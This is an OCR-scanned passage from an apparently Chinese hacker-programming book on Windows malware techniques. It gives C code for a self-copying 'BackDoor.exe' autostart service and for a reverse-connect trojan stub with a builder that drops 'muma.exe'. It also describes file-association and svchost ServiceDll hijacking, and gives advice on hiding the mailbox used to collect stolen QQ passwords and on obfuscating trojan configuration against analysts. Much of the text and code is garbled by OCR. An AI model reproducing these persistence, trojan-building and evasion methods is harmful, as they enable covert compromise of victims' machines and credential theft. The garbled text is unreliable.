return = 


} 

RegCloseKkey (hkKey); 
RegDeleteKey (HKEY CURRENT USER, REG PATH); 
MessageBox (NULL，" 自 启动 成 功 "，" 测 试 "，MB_OK)，; 


return 0; 


} 
首先 说 明 一 下 ， 增 加 的 一 串 码 被 称 为 “GUID”。GUID 被 称 作 全 局 唯一 标识 符 〈Globally 
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Unique Identifier)， 也 称 作 UUID (Universally Unique Identifier)。GUID 是 一 种 由 算法 生成 的 





二 进 制 长 度 为 128 位 的 数字 标识 符 。GUID 主要 用 在 拥有 多 个 节点 、 多 台 计 算 机 的 网 络 或 系 | 第 
关中 GuUiD 的 格式 湾 和 广汉 区 其 疝 允 = 次 允 庆 区 < 又 遇 允 XE 允 区 允 交 -六 天 区 区 区区 又 六 X 汉 区 叉 二 其 中 的 x 是 0 一 9 和 
或 a~f 范 围 内 的 一 个 32 位 十 六 进 制 数 。 在 理想 情况 下 ， 任 何 计算 机 和 计算 机 集群 都 不 会 生 里 
成 两 个 相同 的 GUID。GUID 的 总 数 达 到 2^128 (3.4x10^38) 个 , 所 以 随机 生成 两 个 相同 GUID | 客 
的 可 能 性 非常 小 ， 但 并 不 为 0。GUID 一 词 有 时 也 专 指 微软 对 UUID 标准 的 实现 。 
GUID 可 以 通过 代码 生成 ， 也 可 以 通过 工具 生成 。 这 里 是 通过 工具 生成 的 。 在 “运行 ” | 实 
中 输入 “guidgen”， 即 可 打开 生成 “GUID” 编 码 的 工 . | -| 
ed re ee 厅 
修改 注册 表 第 一 次 局 动 成 功 后 ， 系 统 会 自动 在 CE 
HKEY_CURRENT USER 键 根 对 应 的 注册 表 路 径 位 | CL 2-oLzcHEArf | oa 


置 下 建立 该 GUID 值 。 这 样 ， 当 再 次 启动 时 ， 想 要 通 
过 ActiveX 方式 启动 的 程序 将 不 会 被 再 次 启动 。 因 此 ， 
当 每 次 成 功 启 动 后 ， 需 要 将 HKEY_ CURRENT_USER. 
下 对 应 的 注册 表 路 径 删 除 ， 以 便 保证 下 次 开机 时 的 正 
常 启动 。 

4， 服 务 启 动 图 8-5 guidgen 工具 

服务 启动 也 是 利用 了 系统 的 特性 来 实现 的 。 在 前 面 的 章节 中 已 经 学 习 了 如 何 完成 枚 举 系 
统 中 的 服务 ， 并 控制 服务 的 运行 状态 。 本 章 来 完成 一 个 简单 的 服务 ， 仅 仅 是 完成 一 个 能 够 自 
启动 的 服务 而 已 。 如 果 要 完成 一 个 完整 的 服务 ， 仅 仅 靠 下 面 的 篇 幅 是 完全 不 够 的 。 

通过 服务 启动 的 代码 如 下 : 


#include <Windows.h> 
#include <stdio.h> 

















int main(int asgc ehar*. argv[]) 

{ 
char szFileName [MAX PATH] = { 0 1}; 
GetModuleFileName (NULL, szFileName, MAX PATH); 


SC HANDLE scHandle = OpenSCManager (NULL, NULL, SC MANAGER ALL ACCESS); 
SC HANDLE 'scHandleQpen = OpenServicel(scHandle, "door", SERVICE, ALL ACCESS), 


if ( scHandleOpen == NULL ) 
{ 
3 


char szSelfFile[MAX PATH] = { 0 } 
a 


char szSystemPath{[MAX PATH] 


GetSystemDirectory (szSystemPath, MAX PATH); 
strcat (szSystemPpath, "\\BackDoor.exe"),; 


GetModuleFileName (NULL, szSelfFile, MAX PATH); 
CopyEile (szSelftFile, szSvestempath, FALSE)» 


SC HANDLE scNewHandle = CreateService (scHandle, 
OO 
wire 
SERVICE AT ACCESS, 
SERVICE WIN32 OWN PROCESS, 
SERVIGE AUTO START, 
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SERVICE ERROR IGNORE, 
szSystemPath, 

NULL, 

NULL, 

NULL, 

NULL, 

NULL); 


StartService(scNewHandle, ‘0, NULL); 


CloseServiceHandle (scNewHandle),; 
MessageBox (NULL, "service run", "door", MB OK); 
} 


CloseServiceHandle (scHandleOQpen); 
CloseServiceHandle (scHandle); 


// 下 面 是 自由 发 挥 的 部 分 
// 为 了 能 够 证 明 它 是 自 启动 的 ， 这 里 做 了 一 个 简单 的 记录 时 间 的 功能 
PILbE *obile sl topentoe:N\N\a. Ext™, wa 


SYSTEMTIME St» 
GetSystemTime (&st); 


char sz1ime{lMAXBYTE] ,= ( D 0} 
wsprintf(szTime,, "%d,%d:%d", st.wHour, st.wMinute, (st.wSecond) x 


fputs(szTime, ‘pFile); 
fclose (pFile); 


neeurn 0 


上 面 的 程序 中 并 没有 用 到 新 的 API 函数 ， 请 读者 自行 阅读 理解 并 进行 测试 ， 这 里 不 再 重 
复 介绍 。 

5. 其 他 自 启动 方式 

除了 使 用 上 面 4 种 方法 以 外 ， 还 有 很 多 其 他 自 启动 方法 ， 比 如 文件 关联 启动 、 通 过 
svchost.exe 加 载 启 动 〈 也 叫 替 换 系 统 服务 启动 )、 文 件 感染 启动 、 映 像 支持 等 。 

下 面 大 概 介绍 一 下 这 几 种 启动 方法 。 

文件 关联 启动 是 通过 修改 注册 表 来 完成 的 。 比 如 ， 默 认 启动 “ 文 本 文件 ”的 程序 是 记事 
本 程序 ， 只 要 在 注册 表 中 把 启动 “文本 文件 ”的 关联 程序 改 掉 ， 也 就 是 把 记事 本 程序 改 掉 ， 
改 成 自己 的 木马 程序 ， 然 后 由 木马 去 调用 记事 本 来 启动 文本 文件 ， 这 样 就 达到 了 启动 木马 的 
效果 。 注 册 表 如 图 8-6 所 示 。 


加 “注册 表 久 贺 器 


Td TPlatform. TAppManager 1 I ER da | 
= 9 xtfile _SZ Cr\WINDOWS hotepad,exe al 





i Defauticon 
EH sel 
Bd EditWithys 
-Ed pen 
TY command 
Wd print 
-Oi printto 
: ac 








图 8-6 文本 文件 对 应 的 文件 关联 


文本 文件 对 应 的 文件 关联 的 注册 表 位 置 为 KHEY_CLASS ROOT\txtfile\shellN\open\ command。 
其 默认 值 是 一 个 REG_SZ 类 型 ， 对 应 的 打开 方式 是 使 用 “ci\windowsnotepad.exe” 程 序 。 在 








© 
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这 里 ， 如 果 将 “cxwindowsmotepad.exe” 程 序 进行 替换 ， 比 如 蔡 换 为 “XX.EXE” 程 序 ， 当 
打开 “*.txt” 程 序 的 时 候 就 会 调用 “Xx X .EXE”。 

在 Windows 系统 中 ,按照 服务 数量 对 应 的 进程 数量 分 为 独占 服务 和 共享 服务 。 所 谓 共 享 
服务 ， 是 多 种 服务 都 对 应 在 一 个 进程 中 ， 比 如 svchost.exe 进程 中 就 存在 多 个 服务 。 而 且 在 系 
统 中 有 多 个 svchost.exe 进程 ， 如 图 8-7 所 示 。 

在 一 个 svchost.exe 进程 中 会 有 多 个 服务 存在 ， 这 就 是 所 谓 的 共享 服务 。svchost.exe 本 身 
只 是 一 个 宿主 ， 将 真正 提供 服务 的 DLL 加 载 至 内 存 中 。 将 提供 服务 的 DLL 加 载 到 内 存 的 方 
式 并 不 是 为 svchost,exe 提供 一 个 加 载 参 数 ， 而 是 通过 注册 表 来 指定 。 在 注册 表 中 ， 各 个 服务 
下 面 有 一 个 Parameters 子 键 会 对 应 服务 启动 的 文件 ， 在 注册 表 中 有 具体 的 路 径 为 HKEY 
LOCAL MACHINE\SystemNCurrentControlSet\Services\。 观 察 一 下 RemoteAccess 下 的 Parameters 
子 键 的 值 ， 如 图 8-8 所 示 。 




















图 8-7 ”进程 管理 器 中 的 多 个 svchostexe 进程 图 8-8 ”服务 文件 在 注册 表 中 对 应 的 子 刍 


从 图 8-8 中 可 以 看 到 ，RemoteAccess 服务 对 应 的 文件 是 “%SystemRoot%\System32 
mprdim.dll”， 该 文件 由 ServiceDll 给 出 。 那 么 svchost 是 以 什么 方式 启动 它 的 呢 ? 直接 在 
RemoteAccess 上 查看 ， 如 图 8-9 所 示 。 




















节 儒 空 将 前 其 昱 湘 册 o 小 


图 8-9 svchost 启动 RemoteAccess 服务 的 方式 
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从 图 8-9 中 可 以 看 出 ， 启 动 RemoteAccess 给 svchost.exe 传递 一 个 “-Kknetsvcs” 参 数 。 这 
里 的 参数 “-k netsvcs” 上 有 具体 启动 什么 内 容 呢 ? 这 需要 继续 观察 注册 表 中 的 内 容 。 在 注册 表 的 
HKEY LOCAL MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Svechost\ 中 找到 
“netsvcs”， 然 后 查看 其 内 容 ， 如 图 8-10 所 示 。 


尝 酉 宣 将 沿革 啊 狂 人 山 吕 由 








图 8-10 netsvecs 启动 的 服务 


从 图 8-10 中 可 以 看 出 ，svchost 对 应 的 “netsvcs” 参 数 下 确实 启动 了 “RemoteAccess” 服 
务 ， 还 启动 了 更 多 其 他 相关 的 服务 。 

通过 上 面 的 分 析 ， 可 以 得 到 一 个 简单 的 方法 ， 将 某 服务 中 的 ServiceDI1l 替换 为 自己 的 恶 
意 程序 的 DLL 路 径 ， 即 可 被 svchost 启动 。 关 于 这 部 分 的 代码 实现 就 不 再 继续 深入 讨论 。 
关于 亚 意 程序 的 启动 就 介绍 这 么 多 ， 还 有 其 他 更 多 的 方法 ， 读 者 可 以 自行 查找 相关 的 资 
料 进 行 学 习 。 最 后 介绍 一 款 工具 ， 它 可 以 查看 电脑 上 的 所 有 启动 项 。 也 许 读者 会 想到 360、 
金山 等 一 些 工具 ， 但 是 这 里 要 介绍 的 这 款 工具 是 微软 自己 的 工具 ， 而 且 其 功能 相对 来 说 非常 
全 面 。 该 工具 如 图 8-11 所 示 。 





图 8-11 Autoruns 工具 界面 
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Autoruns 是 一 款 绝对 值得 拥有 的 工具 ， 而 且 是 免费 工具 。 其 中 涵盖 了 相当 全 面 的 启动 管 
理工 具 、 服 务 、 驱 动 、 映 像 动 持 、 注 册 表 、LSP 等 ， 读 者 可 以 自行 下 载 并 进行 体验 。 


py 注 : 在 使 用 Autoruns 时 ， 如 果 不 了 解 某 些 启动 项 ， 请 谨慎 修改 ， 以 免 造成 系统 无 法 启动 。 如 果 系 统 无 法 
启动 ， 笔 者 无 力 帮 助 解决 ， 也 不 负 任何 责任 。 


8.1.2 木马 的 配置 生成 与 反弹 端口 技术 


由 于 黑色 产业 链 的 供需 关系 ， 木 马 、 病 毒 等 恶意 程序 作为 商品 在 网 络 上 有 着 大 量 的 交易 ， 
因此 这 些 恶意 程序 必须 具备 灵活 的 可 配置 性 。 当 然 ， 即 使 是 免费 提供 的 木马 、 病 毒 等 恶意 程 
序 ， 为 了 可 以 让 广大 的 黑 友 去 使 用 ， 它 也 是 具备 
可 配置 性 的 。 因 此 ， 亚 意 程序 的 可 配置 性 已 经 成 
为 最 基本 的 功能 之 一 。 

拿 木马 来 说 ， 木 马 要 进行 配置 后 才 可 以 生成 
真正 的 服务 器 端 ， 也 就 是 被 控制 端 是 经 过 配置 后 
产生 的 。 来 看 一 下 灰 鸽 子 〈 灰 鸽子 是 国产 著名 的 
远程 控制 软件 ) 服务 器 端的 配置 界面 ， 如 图 8-12 
所 示 。 

从 灰 鸽 子 的 配置 界面 中 可 以 看 出 ， 灰 铝 子 支 
持 的 可 配置 的 内 容 非常 多 ， 这 里 只 显示 了 其 配置 
界面 中 的 一 个 界面 。 灰 鸽子 在 进行 服务 器 端的 配 
置 后 会 生成 服务 器 端 程序 。 下 面 就 来 介绍 如 何 编程 实现 木马 的 配置 生成 功能 ， 以 及 反弹 端口 
功能 的 实现 原理 。 

1. 反弹 端口 连接 原理 介绍 

早期 的 防火 墙 在 默认 设置 中 只 对 连 入 主机 的 连接 进行 阻 断 ， 而 不 对 连 出 的 连接 进行 阻 断 。 
因为 早期 防火 墙 总 是 认为 不 安全 的 连接 是 从 外 部 发 起 的 ， 而 内 部 是 不 会 主动 发 起 不 安全 的 连 
接 的 。 简 单 来 说 ， 当 有 人 恶意 试图 连接 有 防火 墙 的 主机 时 ， 防 火 墙 会 给 出 相应 的 连接 提示 ， 
表明 有 非法 访问 要 连接 至 主机 ， 并 且 会 切断 非法 连接 的 链 路 。 相 反 ， 当 主机 向 外 连接 至 其 他 
主机 时 ， 防 火 墙 通常 是 不 会 给 出 提示 和 拦截 的 。 在 这 样 的 情况 下 ， 基 于 反弹 端口 连接 的 木马 
由 此 诞生 了 。 

传统 的 木马 ， 通 常 做 法 是 服务 端 监听 一 个 端口 ， 客 户 端 连接 。 而 反弹 端口 连接 类 型 的 木 
马 则 刚好 相反 。 所 谓 反 弹 端口 连接 的 木马 ， 是 由 攻击 者 监听 一 个 端口 ， 中 木马 的 被 攻击 者 主 
动向 攻击 者 发 起 连接 。 由 于 是 被 攻击 者 主动 发 起 的 连接 ， 被 攻击 者 的 防火 墙 不 会 给 被 攻击 者 
以 安全 提示 。 这 里 给 出 一 个 简单 的 示意 图 进行 说 明 ， 如 图 8-13 所 示 。 

从 图 8-13 中 可 以 看 出 正 向 连接 和 反弹 连接 的 工作 原理 。 在 图 8-13 中 ， 上 面 的 线条 是 正 问 
连接 ， 是 攻击 者 主动 连接 被 攻击 者 的 状态 。 当 攻击 者 的 连接 到 达 防 火 墙 时 ， 防 火 墙 拦截 了 本 
次 恶意 连接 。 而 下 面 的 线条 则 是 反弹 连接 ， 是 被 攻击 者 主动 向 攻击 者 发 起 连接 ， 而 此 时 防火 
墙 将 被 攻击 者 的 连接 放行 ， 使 得 攻击 者 和 被 攻击 者 建立 了 连接 。 
































图 8-12” 灰 忽 子 服务 器 端 配置 界面 








它 尝 悟 剑 将 出 峙 啊 钼 超 % 小 
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图 8-13 木马 连接 示意 图 


通常 情况 下 ， 卫 地 址 都 是 动态 分 配 的 ， 每 次 不 是 固定 的 。 攻 击 者 的 IP 地 址 同样 也 是 变 
动 、 不 固定 的 ， 那 么 “小 白 ” 是 如 何 连 接 到 “黑客 ”的 主机 的 呢 ? 在 这 种 情况 下 ， 通 常 需要 
第 三 者 的 介入 。 一 般 情况 下 , 黑客 要 把 自己 的 IP 地址 动态 地 保存 到 某 个 固定 的 IP 地址 下 ( 比 
如 保存 到 网 上 FTP 空间 中 )， 然 后 木马 通过 读 取 该 瑟 地 址 下 保存 的 黑客 的 他 地 址 进行 连接 。 
同样 用 图 来 说 明 ， 如 图 8-14 所 示 。 


某 服务 器 ， 黑 客 的 耳 地 址 动态 保存 在 这 里 





< 









更 新 自己 的 IP 


小 白 
将 IP 发 送 给 小 白 


成 功 连接 





图 8-14 ”木马 动态 获取 黑客 的 IP 地址 


从 图 8-14 中 可 以 看 出 ， 黑 客 开启 木马 客户 端 后 ， 首 先 会 更 新 服务 器 (可 能 是 Web 服务 
器 ， 也 可 能 是 FTP 服务 器 〉 上 保存 着 的 自己 的 IP 地 址 。“ 小 自 ” 会 读 取 服务 器 中 保存 着 的 黑 
客 的 耳 地 址 ， 然 后 “小 白 ” 连 接 “ 黑 客 ” 的 主机 ， 主 动 地 让 黑客 去 控制 它 ， 这 就 是 木马 中 的 
“自动 上 线 ” 关于 反弹 端口 连接 的 介绍 就 到 这 里 。 有 了 思路 ， 通 过 前 面 学 习 的 Winsock 的 知 
识 ， 读 者 可 以 试 着 实现 一 下 ， 这 里 就 不 做 更 多 的 介绍 了 。 

2. 木马 的 配置 生成 与 配置 信息 的 保护 

木马 开发 完成 以 后 ,通常 会 将 客户 端 和 服务 端 捆绑 发 布 到 网 上 (也 有 很 多 是 私人 自己 的 )。 
在 木马 程序 中 通过 配置 一 些 相 关 的 内 容 和 参数 后 ， 会 生成 一 个 木马 的 服务 器 端 程序 。 前 面 提 
到 的 灰 鲍 子 程序 就 是 这 样 的 。 为 什么 木马 的 客户 端 会 生成 木马 的 服务 端 程序 呢 ? 其 实木 马 的 
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客户 端 和 服务 端 本 来 就 是 两 个 程序 ， 只 是 通过 某 种 方式 使 其 成 了 一 个 程序 而 已 〈《 也 有 的 没有 
将 两 个 程序 捆绑 到 一 起 )。 让 木马 的 服务 端 和 客户 端 成 为 一 个 程序 可 以 有 很 多 种 方法 , 常见 的 
有 资源 法 和 文件 附加 数据 法 两 种 。 

在 PE 文件 结构 中 有 一 个 数据 目录 被 称 作 资源 目录 ， 资 源 目 录 指 向 的 资源 数据 中 保存 着 
图 片 、 图 标 、 音 频 、 视 频 等 内 容 。 资 源 法 就 是 把 服务 端 以 资源 的 形式 连接 到 客户 端的 程序 中 ， 
然后 客户 端 通过 一 些 操作 资源 的 函数 将 资源 读 取出 来 并 保存 在 磁盘 文件 中 。 

文件 附加 数据 法 是 将 服务 端 保存 到 客户 端 文件 的 末尾 ， 然 后 通过 文件 操作 函数 直接 将 服 
务 端 读 取出 来 并 保存 在 磁盘 文件 中 。 

前 面 介绍 , 反弹 端口 连接 被 控制 端 时 ,首先 要 访问 某 个 固定 的 他 地 址 去 读 取保 存 着 黑客 
IP 地 址 的 信息 ， 而 这 个 固定 的 瑟 地 址 无 论 是 FTP 地 址 还 是 Web 地 址 ， 木 马 的 被 控制 端 都 是 
知道 的 ， 因 为 它 保 存在 木马 程序 中 。 由 于 每 个 黑客 使 用 的 固定 IP 地 址 不 同 ， 因 此 这 个 地 址 需 
要 黑客 在 配置 时 指定 一 个 人 P 地 址 ， 然 后 写 到 木马 程序 中 。 

客户 端 在 把 服务 端 生成 以 后 ， 会 把 一 些 配 置信 息 写 入 服务 端 程序 的 指定 位 置 中 ， 服 务 端 
程序 会 读 取 指 定位 置 的 信息 来 进行 使 用 。 对 于 写 程序 来 说 ， 配 置信 息 的 写 入 与 配置 信息 的 读 
取 必 须 一 致 ， 也 就 是 写 入 哪里 ， 就 从 哪里 读 出 ， 否 则 就 没有 意义 了 。 

配置 信息 中 往往 会 存在 攻击 者 的 敏感 信息 , 比如 攻击 者 的 邮箱 账号 和 邮箱 密码 等 内 容 ( 暴 
露 了 自己 的 邮箱 账号 和 邮箱 密码 ， 自 己 盗 取 的 信息 很 容易 被 其 他 人 拿 到 ， 甚 至 自己 也 会 受到 
攻击 )。 比 如 ,在 分 析 盗 QQ 的 木马 时 会 发 现 接 收 QQ 密码 的 邮箱 。 由 于 现在 几乎 所 有 的 邮箱 
在 发 送 邮 件 时 都 需要 进行 SMTP 的 验证 ， 因 此 在 配置 信息 中 就 会 出 现 邮 箱 的 账号 和 密码 。 这 
样 配置 信息 中 的 这 些 敏 感 信息 就 会 被 人 通过 逆向 分 析 而 得 到 , 真是“ 偷 鸡 不 成 蚀 把 米 ”。 对 于 
此 类 情况 ， 正 确 的 做 法 是 对 配置 信息 进行 加 密 。 也 就 是 说 ， 客 户 端 往 服务 端 中 写 配置 信息 前 
需要 加 密 后 再 写 入 ， 而 服务 端 在 使 用 这 些 信息 前 需要 先 解密 再 进行 使 用 。 


DD 注 : 此 种 方法 其 实 仍然 不 可 靠 ， 会 被 别人 分 析 后 得 到 邮箱 账号 和 密码 。 更 好 的 方法 是 将 密码 提交 到 自己 在 
网 上 的 一 个 Web 页 面 中 ， 通 过 Web 页 面 写 入 后 台数 据 库 中 ,这 样 就 不 会 暴露 自己 的 隐私 ， 自 己 的 “成 果 ” 
也 不 会 被 窃取 。 


关于 配置 生成 服务 端 与 配置 信息 的 保护 ， 上 面 已 经 介绍 得 差不多 了 ， 接 下 来 应 该 把 重点 
放 在 代码 的 实现 上 。 这 里 的 代码 是 模拟 实现 上 面 的 内 容 ， 而 不 是 真 的 去 生成 木马 。 

3. 资源 法 生成 木马 服务 端 程序 

通过 使 用 PE 文件 结构 的 资源 来 生成 木马， 首先 要 写 一 个 简单 的 被 生成 的 程序 ， 这 个 程序 要 
去 读 取 被 写 入 的 配置 信息 。 客户 端 把 配置 信息 写 入 服务 端的 文件 末尾 ,服务 端 从 文件 的 模块 将 配 
置信 息 读 出 。 下 面 写 一 个 简单 的 程序 ， 充 当 服 务 端 程序 。 需 要 设置 的 配置 信息 有 IP 地 址 和 端口 
号 两 部 分 ， 把 这 两 部 分 信息 都 写 入 服务 器 端 程序 。 先 来 定义 一 个 配置 信息 的 结构 体 ， 有 具体 如 下 : 


#define IPLEN 20 


typedef struct _SCONFIG 

{ 
char szIpAddress [IPLEN]; 
DWORD dwPort; 

}SCONFIG, *PCONFIG; 


上 面 的 结构 体 有 两 个 成 员 变量 ， 分 别 是 szIpAddress 和 dwPort， 它 们 分 别 表示 IP 地 址 和 
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端口 号 。 下 面 来 写 一 个 模拟 的 简单 的 服务 端 程序 ， 具 体 代码 如 下 : 


第 #inciude <stdio.h> 

8 #include <winsock2.h> 

二 #pragma comment (lib, "ws2_ 32") 
#define IPLEN 20 

黑 

中 typedef struct _SCONFIG 
{ 

程 char szIpAddress[IPLEN]; 

实 DWORD ‘dwPort; 

例 }SCONFIG, *PCONFIG; 

训 人 

析 int main(int argc, char* argv[]) 
+ 

char szFileName [MAX PATH] = { 0 }7 
ss HANDLE hFile = NULL; 


SCONFIG IpConfig = { 0 }; 
DWORD dwFileSize = 0: 
DWORD dwRead = 0;» 


GetModuleFileName (NULL, szrFileName, MAX PATH); 


hFile = CreateFile(szFileName, 
GENERIC READ, 
FILE SHARE READ, 
NULL, 
OPEN_ EXISTING, 
FILE ATTRIBUTE NORMAL, 
0)， 


if ( INVALID HANDLE VALUE == hFile ) 
{ 
return -1; 


} 


dwFileSize = GetFileSize(hFile, 0); 

// 定位 到 配置 信息 的 位 置 

SetFilePointer (hFile,;, QwEileSize - sizeof (SCONFIG), 0, FILE BEGIN); 
// 读 取 配置 信息 

ReadFile(hFile, (LPVOID)&IpConfig, sizeof (SCONFIG), &dwRead, NULL); 


CloseHandle (hFile); 


WSADATA wsa’; 
WSAStartup (MAKEWORD (2, 2), &wsa); 


SOCKET S = socket (PF INET, SOCK STREAM, IPPROTO TCP)，; 
sockaddr in sAddr = { 0 }; 

sAddr.sin family = PE INET; 

// 连接 目标 的 IP 地 址 

| sAddr.sin addr.Ss un.S addr = inet addr (IpConfig.szIpAddress); 
// 连接 目标 的 端口 号 

sAddr. sin port = htonl (IpConfig.dwPort); 


printf ("connecting %s : %d \r\n", IpConfig.szIpAddress, IpConfig.dwPort); 
connect(s, (SOCKADDR *) &sAddr, sizeof (SOCKADDR)); 


Closesocket (s); 


return 07 
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上 面 的 代码 就 是 服务 端 读 取 配 置 文件 的 代码 ， 把 文件 指针 移动 到 配置 信息 处 ， 然 后 直接 
读 取出 来 ,让 服务 端 连接 配置 信息 中 的 IP 地 址 就 可 以 了 。 这 就 是 模拟 的 服务 端 。 下 面 再 来 写 
一 个 模拟 的 客户 端 ， 用 来 对 其 进行 配置 。 

创建 一 个 MFC 的 对 话 框 程序 ， 然 后 对 界面 进行 布局 ， 界 面 布局 如 图 8-15 所 示 。 

把 模拟 的 服务 端 编译 连接 好 以 后 ， 添 加 到 这 个 模拟 客户 端的 资源 里 ， 添 加 方法 是 在 VC 
中 的 资源 选项 卡 中 单 击 鼠标 右键 ， 在 弹出 的 菜单 中 选择 “Import” 命 令 ， 如 图 8-16 所 示 。 然 
后 在 弹出 的 对 话 框 中 选择 编译 好 的 模拟 服务 端 程序 ， 如 图 8-17 所 示 。 出 现 一 个 输入 自 定 义 资 
源 类 型 的 对 话 框 ， 输 入 “IDC_ MUMA”， 如 图 8-18 所 示 。 


a : 








1- String Table ， 
用 Version i 








图 8-15 ”模拟 客户 端 窗口 布局 图 8-16 ”添加 资源 





lmport Resource a | 
查找 范围 加 | 已 Debus -| 4 自 字 国 - 





ortidnaexe | 
we 习 JERWi 
Openas: la  ， 司 





图 8-17 选中 编译 好 的 服务 器 端 程序 


单 击 “OK” 按 钮 ， 就 将 其 添加 到 资源 对 话 框 中 了 ， 如 图 8-19 所 示 。 





-TestClient resources * 
"DC_MUMA" 
5 Dialog 
IDD_ABOUTBOX 


有 Resource type: Cancel 


hoc_Mumal 


IDD_TESTCLIENT_DIA | 
和 -Icon 让 
9- 国 String Table 

由 - 回 version 





-一 SR sa 


图 8-18 自 定义 资源 类 型 对 话 杠 图 8-19 资源 选项 卡 





void CTestClientDl1g::OnBEnCreate() 


// 在 这 里 添加 处 理 程序 
HINSTANCE hinst = NULL; 
hIinst = GetModuleHandle (NULL); 
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// 查找 资源 
第 HRSRC hRes = FindResource (hIinst, MAKEINTRESOURCE(IDR IDC MUMA1),;, "IDC MUMA"); 
8 
Ee // 获取 资源 大 小 
” DWORD len = SizeofResource (hIinst, hRes); 
// 载 入 资源 
黑 HGLOBAL hg = LoadResource(hIinst, hRes); 
3 // 锁定 资源 
-| LPVOID lp = (LPSTR)LockResource (hg); 
已 
还 
实 HANDLE hFile = CreateFilel("muma.eéxe", GENERIC WRITE, FILE SHARE READ, 
例 NULL, CREATE ALWAYS, FILE ATTRIBUTE NORMAL, NULL); 
诗 | 
中 DWORD dwWrite = 0; 
// 将 资源 写 入 文件 
WriterFile(hFile, (LPVOID)hg, len, &dwWrite, NULL)» 
BS a SCONFIG TpConfig .= { 0 }; 


GetDlgIitemText (IDC_EDIT IPADDRESS, IpConfig.szIpAddress, IPLEN); 
IpConfig.dwPort = GetDlgItemIint (IDC EDIT PORT, FALSE, FALSE); 


SetFilePointer (hFile, 0, 0, FILE END); 


// 将 配置 信息 写 入 文件 
WriterFile(hFile, (LPVOID) gIpConfig, sizeof (SCONFIG), &dwWrite, NULE) 


CloseHandle(hFile); 


// 释放 资源 


FreeResource (hg); 
} 


编译 连接 并 运行 这 个 程序 ， 输 入 配置 程序 ， 单 击 “ 生 成 ”按钮 ， 


TT 
会 生成 一 个 muma.exe 程序 。 然 后 运行 这 个 程序 ， 就 会 输出 配置 信息 | 
的 内 容 ， 如 图 8-20 所 示 。 i 
在 这 个 程序 中 使 用 了 4 个 以 前 没有 用 过 的 函数 ， 下 面 分 别 进行 i 
介绍 。 
查找 资源 FindResource() 函 数 的 定义 如 下 : 图 8-20 程序 运行 结果 


HRSRC FindResourcel 
HMODULE hModule, 
LPCTSTR lpName, 
LPCTSTR lpType 


其 中 ，hModule 参数 表示 要 查找 模块 的 句柄 ，lpName 参数 表示 要 查找 资源 的 名 称 。lpType 
参数 表示 要 查找 资源 的 类 型 。 
SizeofResource() 函 数 用 来 计算 被 查找 资源 的 大 小 ， 其 定义 如 下 : 


DWORD SizeofResource! 
HMODULE hModule, 
HRSRC hResInfo 

Ws 


其 中 ，hModule 参数 与 FindResouce() 的 相同 ，hResInfo 表示 FindResouce() 的 返回 值 。 
LoadResource(O) 函 数 用 来 将 资源 载 入 全 局 内 存 中 ， 其 定义 如 下 : 


HGLOBAL LoadResourcel 
HMODULE hModule, 
HRSRC hResInfo 

) 7 


该 函数 参数 的 意义 与 SizeofResource(O) 的 相同 。 
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LockResource() 函 数 的 作用 是 将 资源 锁定 ， 并 返回 其 起 始 位 置 的 指针 ， 其 定义 如 下 : 

LPVOID LockResourcel 

' ,OBE hResData 

上 面 介绍 了 使 用 资源 将 两 个 程序 合并 为 一 个 程序 的 方法 。 除 此 之 外 还 有 一 种 方法 ， 即 使 
用 附加 数据 法 将 两 个 程序 合并 为 一 个 程序 。 何 为 附加 数据 法 呢 ? 附加 数据 经 常 出 现在 壳 中 ， 
PE 文件 在 被 Windows 装载 器 载 入 内 存 时 是 按照 节 来 映射 的 ， 没 有 被 映射 入 内 存 的 部 分 就 是 
附加 数据 ， 虽 然 该 部 分 占用 文件 大 小 ， 却 不 占用 映像 大 小 。 附 加 数据 法 除了 需要 编写 服务 
端 和 客户 端 以 外 ， 还 需要 编写 第 三 个 程序 。 第 三 个 程序 用 来 将 客户 端 程序 和 服务 器 端 程序 
进行 捆绑 ， 捆 绑 的 原理 是 将 服务 端 程序 写 到 客户 端 程序 
的 后 面 ， 最 后 还 需要 写 入 服务 端 程序 的 长 度 ， 示 意图 如 
图 8-21 所 示 。 

当 客 户 端 在 生成 服务 端的 时 候 ， 客 户 端 首先 要 读 出 图 8-21 捆绑 后 的 程序 格式 
服务 端的 长 度 ， 也 就 是 服务 端 程序 的 大 小 ， 然 后 将 服务 端 程序 从 文件 中 读 取 出 来 并 保存 到 磁 
盘 文 件 中 。 附 加 数据 法 的 操作 主要 是 文件 相关 的 操作 ， 就 不 再 具体 进行 介绍 了 。 

在 保护 配置 信息 中 的 敏感 数据 时 需要 保护 两 方面 的 内 容 ， 分 别 是 文件 中 的 配置 信息 和 内 
存 中 的 配置 信息 。 文 件 中 的 配置 信息 只 要 将 配置 信息 进行 加 密 后 写 入 服务 器 端 程序 即 可 ， 当 
服务 器 端 程序 在 使 用 配置 信息 时 解密 还 原 即 可 。 服 务 器 端 程序 在 使 用 配置 信息 时 会 将 配置 信 
息 进行 解密 还 原 ， 那 么 还 是 很 容易 被 发 现 的 。 很 多 加 密 后 的 数据 在 被 还 原 后 ， 还 是 会 在 内 存 
中 很 容易 地 找到 解密 后 的 明文 。 编 程 完毕 后 ， 需 要 对 解密 配置 信息 的 代码 部 分 进行 变换 等 处 
理 ， 最 直接 有 效 和 省 事 的 方法 就 是 对 其 进行 VM (VM 是 一 种 软件 保护 系统 ， 将 保护 后 的 代 
码 放 到 虚拟 机 中 运行 , 这 将 使 分 析 反 编译 后 的 代码 和 破解 变 得 极为 困难 )。 无论 是 文件 中 的 配 
置信 息 ， 还 是 内 存 中 的 配置 信息 ， 在 进行 一 定 的 保护 以 后 ， 会 增加 逆向 分 析 的 难度 。 但 是 ， 
由 于 网 络 的 连接 、 验证 等 通信 工作 , 仍然 可 能 使 用 明文 进行 传输 数据 , 那么 使 用 行为 分 析 ( 抓 
包 、 查 看 主机 连接 ) 可 能 就 会 轻易 地 将 配置 信息 中 的 敏感 数据 暴露 。 比 如 发 送 盗 取 的 QQ 号 
到 自己 的 邮箱 时 ， 即 使 邮箱 的 SMTP 的 账号 和 密码 在 文件 和 内 存 中 都 加 密 处 理 了 ， 但 是 通过 
抓 包 还 是 可 能 会 得 到 邮箱 的 SMTP 账号 和 密码 。 


8.1.3 ”病毒 的 感染 技术 


编写 病毒 是 有 违 道德 与 法 律 的 事情 ， 随 时 都 有 让 自己 若 上 官司 的 可 能 。 这 里 介绍 一 个 简 
单 的 病毒 的 编写 ， 只 是 为 了 进行 研究 ， 以 便 能 够 编 出 更 好 的 防范 工具 。 

1. 病毒 感染 技术 剖析 

